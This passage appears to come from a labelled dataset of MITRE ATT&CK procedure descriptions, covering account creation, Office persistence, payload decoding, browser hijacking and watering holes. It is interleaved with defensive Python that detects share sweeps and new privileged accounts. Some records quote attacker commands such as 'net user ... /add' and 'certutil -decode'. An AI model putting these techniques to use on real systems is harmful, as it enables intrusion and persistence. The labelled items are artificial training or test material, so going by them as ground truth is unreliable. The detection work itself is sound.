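        for i, (start, _) in enumerate(hits):
            targets = {tgt for t, tgt in hits[i:] if t - start <= window}
            if len(targets) >= threshold:
                alerts.append((actor, sorted(targets)))
                break
    return alerts


if __name__ == "__main__":
    for e in EVENTS:
        print(e["host"], e["user"], repr(e["cmd"]), "->", classify(e))
    print("sweeps:", detect_share_sweeps(EVENTS))
```

Both `net.exe` and `net1.exe` are accepted because `net` hands the real work to `net1`, and a quoted full path or a lowercase target still normalises to the same host. The threshold and window are starting points to tune against normal administrator activity on the network in question.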
{"text1":"Dragonfly created accounts that appeared to be tailored to each individual staging target.","labels":"['T1136']"}
|
|
{"text1":"Indrik Spider used \"wmic.exe\" to add a new user to the system.","labels":"['T1136']"}
|
|
{"text1":"Sandworm Team added a login to a SQL Server with \"sp_addlinkedsrvlogin\".","labels":"['T1136']"}
|
|
{"text1":"APT3 has been known to create or enable accounts, such as \"support_388945a0\".","labels":"['T1136.001']"}
|
|
{"text1":"APT39 has created accounts on multiple compromised hosts to perform actions within the network.","labels":"['T1136.001']"}
|
|
{"text1":"APT41 created user accounts and added them to the User and Admin groups.","labels":"['T1136.001']"}
|
|
{"text1":"Carbanak can create a Windows account.","labels":"['T1136.001']"}
|
|
{"text1":"Dragonfly 2.0 created accounts on victims, including administrator accounts, some of which appeared to be tailored to each individual staging target.","labels":"['T1136.001']"}
|
|
{"text1":"Flame can create backdoor accounts with login \u201cHelpAssistant\u201d on domain-connected systems if appropriate rights are available.","labels":"['T1136.001']"}
|
|
{"text1":"Fox Kitten has created a local user account with administrator privileges.","labels":"['T1136.001']"}
|
|
{"text1":"GoldenSpy can create new users on an infected system.","labels":"['T1136.001']"}
|
|
{"text1":"Hildegard has created a user named \u201cmonerodaemon\u201d.","labels":"['T1136.001']"}
|
|
{"text1":"Kimsuky has created accounts with \"net user\".","labels":"['T1136.001']"}
|
|
{"text1":"Leafminer used a tool called Imecab to set up a persistent remote access account on the victim machine.","labels":"['T1136.001']"}
|
|
{"text1":"Magic Hound has created a user named `DefaultAccount` on compromised machines and assigned it to the Administrators and Remote Desktop Users groups.","labels":"['T1136.001']"}
|
|
{"text1":"Mis-Type may create a temporary user on the system named `Lost_{Unique Identifier}`.","labels":"['T1136.001']"}
|
|
{"text1":"Pupy can use PowerView to execute \u201cnet user\u201d commands and create local system accounts.","labels":"['T1136.001']"}
|
|
{"text1":"SMOKEDHAM has created user accounts and added them to local Admin groups.","labels":"['T1136.001']"}
|
|
{"text1":"ServHelper has created a new user and added it to the \"Remote Desktop Users\" and \"Administrators\" groups.","labels":"['T1136.001']"}
|
|
{"text1":"TeamTNT has created local privileged users on victim machines.","labels":"['T1136.001']"}
|
|
{"text1":"The \"net user username password \/add\" command in Net can be used to create a local account.","labels":"['T1136.001']"}
|
|
{"text1":"ZxShell has a feature to create local user accounts.","labels":"['T1136.001']"}
|
|
{"text1":"HAFNIUM has created and granted privileges to domain accounts.","labels":"['T1136.002']"}
|
|
{"text1":"PsExec has the ability to remotely create accounts on target systems.","labels":"['T1136.002']"}
|
|
{"text1":"Pupy can use PowerView to execute \u201cnet user\u201d commands and create domain accounts.","labels":"['T1136.002']"}
|
|
{"text1":"Sandworm Team has created new domain accounts on an ICS access server.","labels":"['T1136.002']"}
|
|
{"text1":"The \"net user username password \/add \/domain\" command in Net can be used to create a domain account.","labels":"['T1136.002']"}
|
|
{"text1":"APT29 can create new users through Azure AD.","labels":"['T1136.003']"}
|
|
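Several T1136 entries above (ServHelper, Magic Hound, SMOKEDHAM, APT41) follow one sequence: create an account, then put it in Administrators or Remote Desktop Users. On Windows the creation is Security event 4720 and the group addition is 4732 (security-enabled local group) or 4728 (security-enabled global group), whether `net user`, WMI, PowerShell or a direct API call did the work. The Python below is an added example, not any listed tool's code, that correlates those events per host and account inside a short window. The log records, hostnames and the ten-minute window are constructed assumptions.

```python
"""Added example (not from any listed tool): pair Security event 4720 (account
created) with 4732/4728 (added to a privileged group) on the same host."""
from datetime import datetime, timedelta

PRIVILEGED_GROUPS = {"administrators", "remote desktop users", "domain admins"}

# Constructed Security log records. Field names loosely mirror the Windows schema
# (SubjectUserName -> subject, TargetUserName / MemberName -> target); values are made up.
EVENTS = [
    {"ts": "2024-05-01T10:00:00", "id": 4720, "host": "WS01", "subject": "CORP\\alice", "target": "svc_tmp"},
    {"ts": "2024-05-01T10:00:02", "id": 4722, "host": "WS01", "subject": "CORP\\alice", "target": "svc_tmp"},
    {"ts": "2024-05-01T10:00:05", "id": 4732, "host": "WS01", "subject": "CORP\\alice", "target": "svc_tmp",
     "group": "Administrators"},
    {"ts": "2024-05-01T10:00:07", "id": 4732, "host": "WS01", "subject": "CORP\\alice", "target": "svc_tmp",
     "group": "Remote Desktop Users"},
    # routine provisioning: the new user lands in Users; Administrators comes an hour later
    {"ts": "2024-05-02T08:00:00", "id": 4720, "host": "WS02", "subject": "CORP\\helpdesk", "target": "jsmith"},
    {"ts": "2024-05-02T08:00:03", "id": 4732, "host": "WS02", "subject": "CORP\\helpdesk", "target": "jsmith",
     "group": "Users"},
    {"ts": "2024-05-02T09:00:00", "id": 4732, "host": "WS02", "subject": "CORP\\helpdesk", "target": "jsmith",
     "group": "Administrators"},
    # domain variant (T1136.002), logged on a domain controller
    {"ts": "2024-05-03T02:10:00", "id": 4720, "host": "DC01", "subject": "CORP\\svc_sql", "target": "backup2"},
    {"ts": "2024-05-03T02:10:20", "id": 4728, "host": "DC01", "subject": "CORP\\svc_sql", "target": "backup2",
     "group": "Domain Admins"},
]


def correlate_new_privileged_accounts(events, window_minutes=10):
    """Return one alert per account that was created (4720) and then added to a
    privileged group (4732 local, 4728 domain global) on the same host within
    the window. Group additions outside the window are ignored."""
    window = timedelta(minutes=window_minutes)
    created = {}   # (host, account) -> (creation time, who created it)
    alerts = {}    # (host, account) -> alert, so several group adds merge into one
    for e in sorted(events, key=lambda ev: ev["ts"]):
        t = datetime.fromisoformat(e["ts"])
        key = (e["host"], e["target"].lower())
        if e["id"] == 4720:
            created[key] = (t, e["subject"])
            continue
        if e["id"] not in (4732, 4728) or e.get("group", "").lower() not in PRIVILEGED_GROUPS:
            continue
        if key not in created or t - created[key][0] > window:
            continue
        alert = alerts.setdefault(key, {
            "host": e["host"], "account": e["target"], "created_by": created[key][1],
            "scope": "local", "groups": [],
        })
        alert["groups"].append(e["group"])
        if e["id"] == 4728:
            alert["scope"] = "domain"
    return list(alerts.values())


if __name__ == "__main__":
    for alert in correlate_new_privileged_accounts(EVENTS):
        print(alert)
```

The correlation keys on the account, not on the tool, so it fires for `net user /add`, WMI, PowerShell and API-based creation alike; widening the window to cover a working day catches slower variants at the cost of more helpdesk noise.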
{"text1":"APT32 has replaced Microsoft Outlook's VbaProject.OTM file to install a backdoor macro for persistence.","labels":"['T1137']"}
|
|
{"text1":"Gamaredon Group has inserted malicious macros into existing documents, providing persistence when they are reopened. Gamaredon Group has loaded the group's previously delivered VBA project by relaunching Microsoft Outlook with the \"\/altvba\" option, once the Application.Startup event is received.","labels":"['T1137']"}
|
|
{"text1":"Ruler can be used to automate the abuse of Outlook Rules, Forms, and Home Pages to establish persistence.","labels":"['T1137']"}
|
|
{"text1":"BackConfig has the ability to use hidden columns in Excel spreadsheets to store executable files or commands for VBA macros.","labels":"['T1137.001']"}
|
|
{"text1":"Cobalt Strike has the ability to use an Excel Workbook to execute additional code by enabling Office to trust macros and execute code without user permission.","labels":"['T1137.001']"}
|
|
{"text1":"MuddyWater has used a Word Template, Normal.dotm, for persistence.","labels":"['T1137.001']"}
|
|
{"text1":"APT28 has used the Office Test persistence mechanism within Microsoft Office by adding the Registry key \"HKCU\\Software\\Microsoft\\Office test\\Special\\Perf\" to execute code.","labels":"['T1137.002']"}
|
|
{"text1":"OilRig has abused the Outlook Home Page feature for persistence. OilRig has also used CVE-2017-11774 to roll back the initial patch designed to protect against Home Page abuse.","labels":"['T1137.004']"}
|
|
{"text1":"Ruler can be used to automate the abuse of Outlook Home Pages to establish persistence.","labels":"['T1137.004']"}
|
|
{"text1":"Bisonal has been loaded through a `.wll` extension added to the ` %APPDATA%\\microsoft\\word\\startup\\` repository.","labels":"['T1137.006']"}
|
|
{"text1":"Naikon has used the RoyalRoad exploit builder to drop a second stage loader, intel.wll, into the Word Startup folder on the compromised host.","labels":"['T1137.006']"}
|
|
{"text1":"ABK has the ability to decrypt AES encrypted payloads.","labels":"['T1140']"}
|
|
{"text1":"APT29 used 7-Zip to decode its Raindrop malware.","labels":"['T1140']"}
|
|
{"text1":"APT34 has used certutil to decode base64-encoded files on victims.","labels":"['T1140']"}
|
|
{"text1":"APT39 has used malware to decrypt encrypted CAB files.","labels":"['T1140']"}
|
|
{"text1":"Agent Tesla has the ability to decrypt strings encrypted with the Rijndael symmetric encryption algorithm.","labels":"['T1140']"}
|
|
{"text1":"Amadey has decoded antivirus name strings.","labels":"['T1140']"}
|
|
{"text1":"An APT19 HTTP malware variant decrypts strings using single-byte XOR keys.","labels":"['T1140']"}
|
|
{"text1":"An APT28 macro uses the command \"certutil -decode\" to decode contents of a .txt file storing the base64 encoded payload.","labels":"['T1140']"}
|
|
{"text1":"AppleSeed can decode its payload prior to execution.","labels":"['T1140']"}
|
|
{"text1":"Aria-body has the ability to decrypt the loader configuration and payload DLL.","labels":"['T1140']"}
|
|
{"text1":"Astaroth uses a fromCharCode() deobfuscation method to avoid explicitly writing execution commands and to hide its code.","labels":"['T1140']"}
|
|
{"text1":"AuditCred uses XOR and RC4 to perform decryption on the code functions.","labels":"['T1140']"}
|
|
{"text1":"Avaddon has decrypted encrypted strings.","labels":"['T1140']"}
|
|
{"text1":"Azorult uses an XOR key to decrypt content and uses Base64 to decode the C2 address.","labels":"['T1140']"}
|
|
{"text1":"BADFLICK can decode shellcode using a custom rotating XOR cipher.","labels":"['T1140']"}
|
|
{"text1":"BBK has the ability to decrypt AES encrypted payloads.","labels":"['T1140']"}
|
|
{"text1":"BBSRAT uses Expand to decompress a CAB file into executable content.","labels":"['T1140']"}
|
|
{"text1":"BLINDINGCAN has used AES and XOR to decrypt its DLLs.","labels":"['T1140']"}
|
|
{"text1":"BRONZE BUTLER downloads encoded payloads and decodes them on the victim.","labels":"['T1140']"}
|
|
{"text1":"Babuk has the ability to unpack itself into memory using XOR.","labels":"['T1140']"}
|
|
{"text1":"BabyShark has the ability to decode downloaded files prior to execution.","labels":"['T1140']"}
|
|
{"text1":"BackConfig has used a custom routine to decrypt strings.","labels":"['T1140']"}
|
|
{"text1":"Bandook has decoded its PowerShell script.","labels":"['T1140']"}
|
|
{"text1":"Bankshot decodes embedded XOR strings.","labels":"['T1140']"}
|
|
{"text1":"Bazar can decrypt downloaded payloads. Bazar also resolves strings and other artifacts at runtime.","labels":"['T1140']"}
|
|
{"text1":"Bisonal has decoded strings in the malware using XOR and RC4.","labels":"['T1140']"}
|
|
{"text1":"BoomBox can decrypt AES-encrypted files downloaded from C2.","labels":"['T1140']"}
|
|
{"text1":"Bumblebee can deobfuscate C2 server responses and unpack its code on targeted hosts.","labels":"['T1140']"}
|
|
{"text1":"Bundlore has used \"openssl\" to decrypt AES encrypted payload data. Bundlore has also used base64 and RC4 with a hardcoded key to deobfuscate data.","labels":"['T1140']"}
|
|
{"text1":"Carbon decrypts task and configuration files for execution.","labels":"['T1140']"}
|
|
{"text1":"Cardinal RAT decodes many of its artifacts and is decrypted (AES-128) after being downloaded.","labels":"['T1140']"}
|
|
{"text1":"Chaes has decrypted an AES encrypted binary file to trigger the download of other files.","labels":"['T1140']"}
|
|
{"text1":"CharmPower can decrypt downloaded modules prior to execution.","labels":"['T1140']"}
|
|
{"text1":"Chrommme can decrypt its encrypted internal code.","labels":"['T1140']"}
|
|
{"text1":"Clambling can deobfuscate its payload prior to execution.","labels":"['T1140']"}
|
|
{"text1":"Clop has used a simple XOR operation to decrypt strings.","labels":"['T1140']"}
|
|
{"text1":"Cobalt Strike can deobfuscate shellcode using a rolling XOR and decrypt metadata from Beacon sessions.","labels":"['T1140']"}
|
|
{"text1":"CoinTicker decodes the initially-downloaded hidden encoded file using OpenSSL.","labels":"['T1140']"}
|
|
{"text1":"CookieMiner has used Google Chrome's decryption and extraction operations.","labels":"['T1140']"}
|
|
{"text1":"Crimson can decode its encoded PE file prior to execution.","labels":"['T1140']"}
|
|
{"text1":"Cyclops Blink can decrypt and parse instructions sent from C2.","labels":"['T1140']"}
|
|
{"text1":"DDKONG decodes an embedded configuration using XOR.","labels":"['T1140']"}
|
|
{"text1":"DarkWatchman has the ability to self-extract as a RAR archive.","labels":"['T1140']"}
|
|
{"text1":"Darkhotel has decrypted strings and imports using RC4 during execution.","labels":"['T1140']"}
|
|
{"text1":"Denis will decrypt important strings used for C&C communication.","labels":"['T1140']"}
|
|
{"text1":"Drovorub has de-obfuscated XOR encrypted payloads in WebSocket messages.","labels":"['T1140']"}
|
|
{"text1":"Dtrack has used a decryption routine that is part of an executable physical patch.","labels":"['T1140']"}
|
|
{"text1":"During Frankenstein, the threat actors deobfuscated Base64-encoded commands following the execution of a malicious script, which revealed a small script designed to obtain an additional payload.","labels":"['T1140']"}
|
|
{"text1":"During Operation Dust Storm, attackers used VBS code to decode payloads.","labels":"['T1140']"}
|
|
{"text1":"During Operation Honeybee, malicious files were decoded prior to execution.","labels":"['T1140']"}
|
|
{"text1":"During execution, Threat Group-3390 malware deobfuscates and decompresses code that was encoded with Metasploit\u2019s shikata_ga_nai encoder as well as compressed with LZNT1 compression.","labels":"['T1140']"}
|
|
{"text1":"Earth Lusca has used certutil to decode a string into a cabinet file.","labels":"['T1140']"}
|
|
{"text1":"Ebury has verified C2 domain ownership by decrypting the TXT record using an embedded RSA public key.","labels":"['T1140']"}
|
|
{"text1":"Ecipekac has the ability to decrypt fileless loader modules.","labels":"['T1140']"}
|
|
{"text1":"Egregor has been decrypted before execution.","labels":"['T1140']"}
|
|
{"text1":"Exaramel for Linux can decrypt its configuration file.","labels":"['T1140']"}
|
|
{"text1":"Expand can be used to decompress a local or remote CAB file into an executable.","labels":"['T1140']"}
|
|
{"text1":"FatDuke can decrypt AES encrypted C2 communications.","labels":"['T1140']"}
|
|
{"text1":"FinFisher extracts and decrypts stage 3 malware, which is stored in encrypted resources.","labels":"['T1140']"}
|
|
{"text1":"For Operation Spalax, the threat actors used a variety of packers and droppers to decrypt malicious payloads.","labels":"['T1140']"}
|
|
{"text1":"Gelsemium can decompress and decrypt DLLs and shellcode.","labels":"['T1140']"}
|
|
{"text1":"GoldMax has decoded and decrypted the configuration file when executed.","labels":"['T1140']"}
|
|
{"text1":"Goopy has used a polymorphic decryptor to decrypt itself at runtime.","labels":"['T1140']"}
|
|
{"text1":"Green Lambert can use multiple custom routines to decrypt strings prior to execution.","labels":"['T1140']"}
|
|
{"text1":"GrimAgent can use a decryption algorithm for strings based on Rotate on Right (RoR) and Rotate on Left (RoL) functionality.","labels":"['T1140']"}
|
|
{"text1":"Hancitor has decoded Base64 encoded URLs to insert a recipient\u2019s name into the filename of the Word document. Hancitor has also extracted executables from ZIP files.","labels":"['T1140']"}
|
|
{"text1":"HermeticWiper can decompress and copy driver files using `LZCopy`.","labels":"['T1140']"}
|
|
{"text1":"Heyoka Backdoor can decrypt its payload prior to execution.","labels":"['T1140']"}
|
|
{"text1":"Hildegard has decrypted ELF files with AES.","labels":"['T1140']"}
|
|
{"text1":"Honeybee drops a Word file containing a Base64-encoded file in it that is read, decoded, and dropped to the disk by the macro.","labels":"['T1140']"}
|
|
{"text1":"IceApple can use a Base64-encoded AES key to decrypt tasking.","labels":"['T1140']"}
|
|
{"text1":"Industroyer decrypts code to connect to a remote C2 server.","labels":"['T1140']"}
|
|
{"text1":"InvisiMole can decrypt, unpack and load a DLL from its resources, or from blobs encrypted with Data Protection API, two-key triple DES, and variations of the XOR cipher.","labels":"['T1140']"}
|
|
{"text1":"IronNetInjector has the ability to decrypt embedded .NET and PE payloads.","labels":"['T1140']"}
|
|
{"text1":"KGH_SPY can decrypt encrypted strings and write them to a newly created folder.","labels":"['T1140']"}
|
|
{"text1":"KOCTOPUS has deobfuscated itself before executing its commands.","labels":"['T1140']"}
|
|
{"text1":"Ke3chang has deobfuscated Base64-encoded shellcode strings prior to loading them.","labels":"['T1140']"}
|
|
{"text1":"Kerrdown can decode, decrypt, and decompress multiple layers of shellcode.","labels":"['T1140']"}
|
|
{"text1":"Kessel has decrypted the binary's configuration once the \"main\" function was launched.","labels":"['T1140']"}
|
|
{"text1":"Kobalos decrypts strings right after the initial communication, but before the authentication process.","labels":"['T1140']"}
|
|
{"text1":"Kwampirs decrypts and extracts a copy of its main DLL payload when executing.","labels":"['T1140']"}
|
|
{"text1":"Lazarus Group has used shellcode within macros to decrypt and manually map DLLs and shellcode into memory at runtime.","labels":"['T1140']"}
|
|
{"text1":"Leviathan has used a DLL known as SeDll to decrypt and execute other JavaScript backdoors.","labels":"['T1140']"}
|
|
{"text1":"LightNeuron has used AES and XOR to decrypt configuration files and commands.","labels":"['T1140']"}
|
|
{"text1":"LiteDuke has the ability to decrypt and decode multiple layers of obfuscation.","labels":"['T1140']"}
|
|
{"text1":"Lokibot has decoded and decrypted its stages multiple times using hard-coded keys to deliver the final payload, and has decoded its server response hex string using XOR.","labels":"['T1140']"}
|
|
{"text1":"Lucifer can decrypt its C2 address upon execution.","labels":"['T1140']"}
|
|
{"text1":"MacMa decrypts a downloaded file using AES-128-EBC with a custom delta.","labels":"['T1140']"}
|
|
{"text1":"MirageFox has a function for decrypting data containing C2 configuration information.","labels":"['T1140']"}
|
|
{"text1":"Molerats decompresses ZIP files once on the victim machine.","labels":"['T1140']"}
|
|
{"text1":"Mongall has the ability to decrypt its payload prior to execution.","labels":"['T1140']"}
|
|
{"text1":"Mori can resolve networking APIs from strings that are ADD-encrypted.","labels":"['T1140']"}
|
|
{"text1":"NativeZone can decrypt and decode embedded Cobalt Strike beacon stage shellcode.","labels":"['T1140']"}
|
|
{"text1":"Netwalker's PowerShell script can decode and decrypt multiple layers of obfuscation, leading to the Netwalker DLL being loaded into memory.","labels":"['T1140']"}
|
|
{"text1":"OSX\/Shlayer can base64-decode and AES-decrypt downloaded payloads. Versions of OSX\/Shlayer pass encrypted and password-protected code to \"openssl\" and then write the payload to the \"\/tmp\" folder.","labels":"['T1140']"}
|
|
{"text1":"Okrum's loader can decrypt the backdoor code, embedded within the loader or within a legitimate PNG file. A custom XOR cipher or RC4 is used for decryption.","labels":"['T1140']"}
|
|
{"text1":"One TYPEFRAME variant decrypts an archive using an RC4 key, then decompresses and installs the decrypted malicious DLL module. Another variant decodes the embedded file by XORing it with the value \"0x35\".","labels":"['T1140']"}
|
|
{"text1":"OnionDuke can use a custom decryption algorithm to decrypt strings.","labels":"['T1140']"}
|
|
{"text1":"OopsIE concatenates then decompresses multiple resources to load an embedded .Net Framework assembly.","labels":"['T1140']"}
|
|
{"text1":"P.A.S. Webshell can use a decryption mechanism to process a user supplied password and allow execution.","labels":"['T1140']"}
|
|
{"text1":"PUNCHBUGGY has used PowerShell to decode base64-encoded assembly.","labels":"['T1140']"}
|
|
{"text1":"PcShare has decrypted its strings by applying a XOR operation and a decompression using a custom implemented LZM algorithm.","labels":"['T1140']"}
|
|
{"text1":"Pillowmint has been decompressed by included shellcode prior to being launched.","labels":"['T1140']"}
|
|
{"text1":"PlugX decompresses and decrypts itself using the Microsoft API call RtlDecompressBuffer.","labels":"['T1140']"}
|
|
{"text1":"PoetRAT has used LZMA and base64 libraries to decode obfuscated scripts.","labels":"['T1140']"}
|
|
{"text1":"Proton uses an encrypted file to store commands and configuration values.","labels":"['T1140']"}
|
|
{"text1":"Pteranodon can decrypt encrypted data strings prior to using them.","labels":"['T1140']"}
|
|
{"text1":"PyDCrypt has decrypted and dropped the DCSrv payload to disk.","labels":"['T1140']"}
|
|
{"text1":"QUADAGENT uses AES and a preshared key to decrypt the custom Base64 routine used to encode strings and scripts.","labels":"['T1140']"}
|
|
{"text1":"QakBot can deobfuscate and re-assemble code strings for execution.","labels":"['T1140']"}
|
|
{"text1":"RDAT can deobfuscate the base64-encoded and AES-encrypted files downloaded from the C2 server.","labels":"['T1140']"}
|
|
{"text1":"REvil can decode encrypted strings to enable execution of commands and payloads.","labels":"['T1140']"}
|
|
{"text1":"RGDoor decodes Base64 strings and decrypts strings using a custom XOR algorithm.","labels":"['T1140']"}
|
|
{"text1":"ROKRAT can decrypt strings using the victim's hostname as the key.","labels":"['T1140']"}
|
|
{"text1":"Raindrop decrypted its Cobalt Strike payload using an AES-256 encryption algorithm in CBC mode with a unique key per sample.","labels":"['T1140']"}
|
|
{"text1":"Ramsay can extract its agent from the body of a malicious document.","labels":"['T1140']"}
|
|
{"text1":"RegDuke can decrypt strings with a key either stored in the Registry or hardcoded in the code.","labels":"['T1140']"}
|
|
{"text1":"Rising Sun has decrypted itself using a single-byte XOR scheme. Additionally, Rising Sun can decrypt its configuration data at runtime.","labels":"['T1140']"}
|
|
{"text1":"RogueRobin decodes an embedded executable using base64 and decompresses it.","labels":"['T1140']"}
|
|
{"text1":"SDBbot has the ability to decrypt and decompress its payload to enable code execution.","labels":"['T1140']"}
|
|
{"text1":"SUNSPOT decrypts SUNBURST, which was stored in AES128-CBC encrypted blobs.","labels":"['T1140']"}
|
|
{"text1":"Saint Bot can deobfuscate strings and files for execution.","labels":"['T1140']"}
|
|
{"text1":"Sandworm Team's VBS backdoor can decode Base64-encoded data and save it to the %TEMP% folder. The group also decrypted received information using the Triple DES algorithm and decompresses it using GZip.","labels":"['T1140']"}
|
|
{"text1":"ShadowPad has decrypted a binary blob to start execution.","labels":"['T1140']"}
|
|
{"text1":"ShimRat has decompressed its core DLL using shellcode once an impersonated antivirus component was running on a system.","labels":"['T1140']"}
|
|
{"text1":"Sibot can decrypt data received from a C2 and save to a file.","labels":"['T1140']"}
|
|
{"text1":"Skidmap has the ability to download, unpack, and decrypt tar.gz files.","labels":"['T1140']"}
|
|
{"text1":"Smoke Loader deobfuscates its code.","labels":"['T1140']"}
|
|
{"text1":"SombRAT can run \"upload\" to decrypt and upload files from storage.","labels":"['T1140']"}
|
|
{"text1":"SoreFang can decode and decrypt exfiltrated data sent to C2.","labels":"['T1140']"}
|
|
{"text1":"Spark has used a custom XOR algorithm to decrypt the payload.","labels":"['T1140']"}
|
|
{"text1":"Squirrelwaffle has decrypted files and payloads using a XOR-based algorithm.","labels":"['T1140']"}
|
|
{"text1":"SysUpdate can deobfuscate packed binaries in memory.","labels":"['T1140']"}
|
|
{"text1":"TA505 has decrypted packed DLLs with an XOR key.","labels":"['T1140']"}
|
|
{"text1":"TEARDROP was decoded using a custom rolling XOR algorithm to execute a customized Cobalt Strike payload.","labels":"['T1140']"}
|
|
{"text1":"TSCookie has the ability to decrypt, load, and execute a DLL and its resources.","labels":"['T1140']"}
|
|
{"text1":"Taidoor can use a stream cipher to decrypt strings used by the malware.","labels":"['T1140']"}
|
|
{"text1":"TeamTNT has used a script that decodes a Base64-encoded version of WeaveWorks Scope.","labels":"['T1140']"}
|
|
{"text1":"The Chinoxy dropping function can initiate decryption of its config file.","labels":"['T1140']"}
|
|
{"text1":"ThreatNeedle can decrypt its payload using RC4, AES, or one-byte XORing.","labels":"['T1140']"}
|
|
{"text1":"Tropic Trooper used shellcode with an XOR algorithm to decrypt a payload. Tropic Trooper also decrypted image files which contained a payload.","labels":"['T1140']"}
|
|
{"text1":"Turian has the ability to use a XOR decryption key to extract C2 server domains and IP addresses.","labels":"['T1140']"}
|
|
{"text1":"Turla has used a custom decryption routine, which pulls key and salt values from other artifacts such as a WMI filter or PowerShell Profile, to decode encrypted PowerShell payloads.","labels":"['T1140']"}
|
|
{"text1":"Upon execution, Metamorfo has unzipped itself after being downloaded to the system and has performed string decryption.","labels":"['T1140']"}
|
|
{"text1":"Ursnif has used crypto key information stored in the Registry to decrypt Tor clients dropped to disk.","labels":"['T1140']"}
|
|
{"text1":"VaporRage can deobfuscate XOR-encoded shellcode prior to execution.","labels":"['T1140']"}
|
|
{"text1":"Volgmer deobfuscates its strings and APIs once it is executed.","labels":"['T1140']"}
|
|
{"text1":"WIRTE has used Base64 to decode malicious VBS script.","labels":"['T1140']"}
|
|
{"text1":"WastedLocker's custom cryptor, CryptOne, used an XOR based algorithm to decrypt the payload.","labels":"['T1140']"}
|
|
{"text1":"Waterbear has the ability to decrypt its RC4 encrypted payload for execution.","labels":"['T1140']"}
|
|
{"text1":"WellMail can decompress scripts received from C2.","labels":"['T1140']"}
|
|
{"text1":"WellMess can decode and decrypt data received from C2.","labels":"['T1140']"}
|
|
{"text1":"WhisperGate can deobfuscate downloaded files stored in reverse byte order and decrypt embedded resources using multiple XOR operations.","labels":"['T1140']"}
|
|
{"text1":"WindTail has the ability to decrypt strings using hard-coded AES keys.","labels":"['T1140']"}
|
|
{"text1":"Winnti for Linux has decoded XOR encoded strings holding its configuration upon execution.","labels":"['T1140']"}
|
|
{"text1":"ZIRCONIUM has used the AES256 algorithm with a SHA1 derived key to decrypt exploit code.","labels":"['T1140']"}
|
|
{"text1":"Zebrocy decodes its secondary payload and writes it to the victim\u2019s machine. Zebrocy also uses AES and XOR to decrypt strings and payloads.","labels":"['T1140']"}
|
|
{"text1":"ZeroT shellcode decrypts and decompresses its RC4-encrypted payload.","labels":"['T1140']"}
|
|
{"text1":"Zeus Panda decrypts strings in the code during the execution process.","labels":"['T1140']"}
|
|
{"text1":"certutil has been used to decode binaries hidden inside certificate files as Base64 information.","labels":"['T1140']"}
|
|
{"text1":"menuPass has used certutil in a macro to decode base64-encoded content contained in a dropper document attached to an email. The group has also used \"certutil -decode\" to decode files on the victim\u2019s machine when dropping UPPERCUT.","labels":"['T1140']"}
|
|
{"text1":"xCaon has decoded strings from the C2 server before executing commands.","labels":"['T1140']"}
|
|
{"text1":"Bundlore can install malicious browser extensions that are used to hijack user searches.","labels":"['T1176']"}
|
|
{"text1":"Kimsuky has used Google Chrome browser extensions to infect victims and to steal passwords and cookies.","labels":"['T1176']"}
|
|
{"text1":"Agent Tesla has the ability to use form-grabbing to extract data from web data forms.","labels":"['T1185']"}
|
|
{"text1":"Carberp has captured credentials when a user performs login through a SSL session.","labels":"['T1185']"}
|
|
{"text1":"Cobalt Strike can perform browser pivoting and inject into a user's browser to inherit cookies, authenticated HTTP sessions, and client SSL certificates.","labels":"['T1185']"}
|
|
{"text1":"Dridex can perform browser attacks via web injects to steal information such as credentials, certificates, and cookies.","labels":"['T1185']"}
|
|
{"text1":"QakBot can use advanced web injects to steal web banking credentials.","labels":"['T1185']"}
|
|
{"text1":"TrickBot uses web injects and browser redirection to trick the user into providing their login credentials on a fake or modified web page.","labels":"['T1185']"}
|
|
{"text1":"Ursnif has injected HTML codes into banking sites to steal sensitive online banking information (ex: usernames and passwords).","labels":"['T1185']"}
|
|
{"text1":"DarkHydrus used Template Injection to launch an authentication window for users to enter their credentials.","labels":"['T1187']"}
|
|
{"text1":"Dragonfly 2.0 has gathered hashed user credentials over SMB using spearphishing attachments with external resource links and by modifying .LNK file icon resources to collect credentials from virtualized systems.","labels":"['T1187']"}
|
|
{"text1":"Dragonfly has gathered hashed user credentials over SMB using spearphishing attachments with external resource links and by modifying .LNK file icon resources to collect credentials from virtualized systems.","labels":"['T1187']"}
|
|
{"text1":"APT19 performed a watering hole attack on forbes.com in 2014 to compromise targets.","labels":"['T1189']"}
|
|
{"text1":"APT32 has infected victims by tricking them into visiting compromised watering hole websites.","labels":"['T1189']"}
|
|
{"text1":"APT37 has used strategic web compromises, particularly of South Korean websites, to distribute malware. The group has also used torrent file-sharing sites to more indiscriminately disseminate malware to victims. As part of their compromises, the group has used a Javascript based profiler called RICECURRY to profile a victim's web browser and deliver malicious code accordingly.","labels":"['T1189']"}
|
|
{"text1":"APT38 has conducted watering hole schemes to gain initial access to victims.","labels":"['T1189']"}
|
|
{"text1":"Andariel has used watering hole attacks, often with zero-day exploits, to gain initial access to victims within a specific IP range.","labels":"['T1189']"}
|
|
{"text1":"Axiom has used watering hole attacks to gain access.","labels":"['T1189']"}
|
|
{"text1":"BRONZE BUTLER compromised three Japanese websites using a Flash exploit to perform watering hole attacks.","labels":"['T1189']"}
|
|
{"text1":"Bundlore has been spread through malicious advertisements on websites.","labels":"['T1189']"}
|
|
{"text1":"Dark Caracal leveraged a watering hole to serve up malicious code.","labels":"['T1189']"}
|
|
{"text1":"Darkhotel used embedded iframes on hotel login portals to redirect selected victims to download malware.","labels":"['T1189']"}
|
|
{"text1":"Dragonfly 2.0 compromised legitimate organizations' websites to create watering holes to compromise victims.","labels":"['T1189']"}
|
|
{"text1":"Dragonfly has compromised targets via strategic web compromise (SWC) utilizing a custom exploit kit.","labels":"['T1189']"}
|
|
{"text1":"During Operation Dust Storm, the threat actors used a watering hole attack on a popular software reseller to exploit the then-zero-day Internet Explorer vulnerability CVE-2014-0322.","labels":"['T1189']"}
|
|
{"text1":"Earth Lusca has performed watering hole attacks.","labels":"['T1189']"}
|
|
{"text1":"Elderwood has delivered zero-day exploits and malware to victims by injecting malicious code into specific public Web pages visited by targets within a particular sector.","labels":"['T1189']"}
|
|
{"text1":"Grandoreiro has used compromised websites and Google Ads to bait victims into downloading its installer.","labels":"['T1189']"}
|
|
{"text1":"KARAE was distributed through torrent file-sharing websites to South Korean victims, using a YouTube video downloader application as a lure.","labels":"['T1189']"}
|
|
{"text1":"Lazarus Group delivered RATANKBA and other malicious code to victims via a compromised legitimate website.","labels":"['T1189']"}
|
|
{"text1":"Leafminer has infected victims using watering holes.","labels":"['T1189']"}
|
|
{"text1":"Leviathan has infected victims using watering holes.","labels":"['T1189']"}
|
|
{"text1":"LoudMiner is typically bundled with pirated copies of Virtual Studio Technology (VST) for Windows and macOS.","labels":"['T1189']"}
|
|
